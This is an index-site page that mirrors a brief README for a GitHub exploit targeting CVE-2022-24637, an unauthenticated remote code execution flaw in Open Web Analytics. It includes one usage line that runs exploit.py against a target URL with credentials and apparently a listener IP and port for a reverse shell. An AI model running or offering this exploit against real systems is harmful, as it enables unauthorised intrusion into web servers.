Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/hupe1980/cve-2022-24637

Open Web Analytics (OWA) - Unauthenticated Remote Code Execution
https://github.com/hupe1980/cve-2022-24637

cve-2022-24637 openwebanalytics owa

Last synced: 29 days ago
JSON representation

Open Web Analytics (OWA) - Unauthenticated Remote Code Execution

Awesome Lists containing this project

README

        

# CVE-2022-24637
> Open Web Analytics (OWA) - Unauthenticated Remote Code Execution

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24637

## Example
```bash
python3 exploit.py -u admin -p hacker http://target.org 10.10.11.12 4444
```